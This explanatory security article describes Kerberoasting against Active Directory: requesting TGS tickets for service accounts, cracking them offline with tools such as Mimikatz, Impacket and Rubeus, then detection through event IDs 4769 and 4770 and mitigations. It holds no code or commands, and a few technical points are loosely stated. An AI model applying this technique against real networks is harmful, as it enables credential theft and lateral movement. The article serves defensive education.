Kerberoasting, a term that often pops up in conversations about post-exploitation attack strategies, is a technique attackers use to obtain the password hash of an Active Directory (AD) account that has a servicePrincipalName (SPN) value. As a technique that exploits the Kerberos authentication protocol, it has caught the attention of cybersecurity experts due to its potential for damaging breaches. This article aims to provide an in-depth understanding of Kerberoasting, its working process, popular tools used for carrying out the attack, and detection and mitigation strategies.
The Basics of Kerberoasting
Kerberoasting utilizes a weakness within the Kerberos authentication protocol. In Active Directory, Service Principal Names (SPNs) unique identifiers for each instance of a Windows service. SPNs are associated with user or computer accounts, known as service accounts, which are specifically tasked with running services and applications. These service accounts are typically granted the least privilege necessary to perform their function.
An attacker exploiting a Kerberoasting attack manipulates the SPN value related to a service account, then requests a Ticket Granting Service (TGS) ticket for that account. As a result, the obtained TGS ticket, encrypted with the password hash of the service account assigned to the requested SPN, becomes the primary target for the attacker.
Extraction of TGS Tickets
The extraction of TGS tickets forms the crux of a Kerberoasting attack. By capturing or extracting the TGS tickets, the attacker can access the password hash of the service account. This provides an opportunity for the attacker to perform an offline brute force attack, aiming to crack the password hash and retrieve the plaintext password.
Tools and Techniques for Conducting a Kerberoasting Attack
While many tools can be used to execute Kerberoasting, Mimikatz, Impacket, and Rubeus are commonly employed by attackers. These tools simplify the attack process by automating key steps and extracting necessary data.
Mimikatz, perhaps the most well-known tool associated with Kerberoasting, simplifies the process by automating the extraction of password hashes from memory. An attacker operating Mimikatz can make a request for a TGS ticket for a service using its SPN and valid domain credentials, then extract the password hashes from the obtained TGS ticket.
Impacket is another valuable tool for those interacting with the Kerberos protocol. It allows attackers to extract service account password hashes by requesting service tickets from the Key Distribution Center (KDC). Impacket can perform all necessary steps to request a TGS ticket for a service given its SPN and valid domain credentials, making it a significant asset in any Kerberoasting attack.
Rubeus is another powerful tool for executing Kerberoasting attacks against Active Directory environments. It simplifies the process by automating key steps. It helps to enumerate Service Principal Names (SPNs), request Ticket Granting Service (TGS) tickets for service accounts, and extract password hashes from memory. This gathered information can then be used for offline password cracking, leveraging the potential weakness of service account passwords.
Offline Password Cracking: The Crux of Kerberoasting
Possessing stolen password hashes, an adversary can perform an offline password cracking attack to obtain the plaintext password. Offline password cracking attacks don’t require attackers to communicate with the active directory, making the attack undetectable.
Using Cracked Passwords to Further Objectives
Once the password has been cracked, the attacker can use the service account’s credentials to access network resources and further their objectives. This can include exfiltrating data, moving laterally within the network, or escalating their privileges.
Detecting Kerberoasting Attacks
Detecting a Kerberoasting attack involves closely observing the Windows event log for unusual requests for ticket-granting service (TGS). By closely monitoring and analyzing these events, one can identify patterns or abnormalities that may signify a Kerberoasting attack.
Windows Event ID 4769
Windows Event ID 4769 is generated whenever a Kerberos Ticket Granting Service (TGS) request is received by the Key Distribution Center (KDC). This event is key for detecting a Kerberoasting attack.
Windows Event ID 4770
Windows Event ID 4770 is associated with the renewal of a Kerberos service ticket. When monitoring for Kerberoasting attacks, this event could provide useful insight but might not be as direct as event ID 4769.
Mitigating Kerberoasting Attacks: Best Practices
To safeguard service account passwords from Kerberoasting attacks, several measures can be taken. These include rejecting authentication requests not using Kerberos Flexible Authentication Secure Tunneling (FAST), eliminating the use of insecure protocols in Kerberos, and adopting strong password hygiene practices for service accounts.
Understanding the intricacies of a Kerberoasting attack, its structure, and the tools used to execute it, helps in developing effective detection and mitigation strategies. By closely monitoring the Windows event log for unusual requests for ticket-granting service (TGS), organizations can identify early signs of a Kerberoasting attack. Employing mitigation strategies such as rejecting authentication requests not using Kerberos Flexible Authentication Secure Tunneling (FAST), eliminating the use of insecure protocols in Kerberos, and adopting strong password hygiene practices for service accounts, are effective measures to safeguard service account passwords from Kerberoasting attacks.